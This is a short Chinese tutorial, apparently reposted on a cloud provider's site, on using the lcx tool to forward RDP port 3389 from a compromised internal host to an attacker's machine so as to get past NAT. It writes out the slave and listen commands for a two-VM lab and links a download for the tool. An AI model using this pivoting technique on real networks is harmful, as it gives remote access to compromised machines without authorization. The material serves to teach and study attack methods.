温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

网络安全系列之二 lcx端口转发实现内网突破

发布时间:2020-08-06 11:30:30 来源:网络 阅读:5511 作者:yttitan 栏目:安全技术

内网中的主机一般都是使用私有IP,在网络出口处经过NAT转换为公网IP之后,才能访问Internet。在这种网络结构下,通信双方之间实现的是单向访问,即只有内网中的主机可以主动访问Internet中的主机,反之则不行。如果在内网中架设了一台服务器,又需要允许Internet中的用户访问这台服务器,那么就必须在网络出口处进行端口映射。
在网络***中,如果捕获了一台位于内网中的肉鸡,那么***是无法主动去连接这台肉鸡的,而且也不可能在人家的网络出口做端口映射,这时就可以用到lcx这个小工具了。下载地址:http://down.51cto.com/data/1878979

Lcx可以实现端口转发,将肉鸡A上的某个端口(如3389)转发到具有公网地址的主机B上,这样***只需连接主机B的3389端口就相当于连接到了肉鸡A上,从而突破了内网私有IP的限制。
下面在vmware中利用2台虚拟机来模拟操作,一台虚拟机作为***主机(IP地址192.168.80.128),另一台虚拟机作为肉鸡(IP地址192.168.80.129)。
首先将lcx分别放到这两台虚拟机的C盘根目录下,首先在肉鸡上执行命令“lcx –slave 192.168.80.128 5000 192.168.80.129 3389”,也就是将192.168.80.129上的3389端口转发到192.168.80.128上的5000端口。
然后再到***主机上执行命令“lcx –listen 5000 3389”,也就是在5000端口上监听,并将收到的数据转发到自己的3389端口上。此时在***主机上执行“netstat –an”命令,可以看到同时开放了5000和3389两个端口。
最后在***主机上打开mstsc,只需输入自己的IP地址(192.168.80.128或是127.0.0.1)便可以连接到肉鸡上了,从而实现内网突破。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI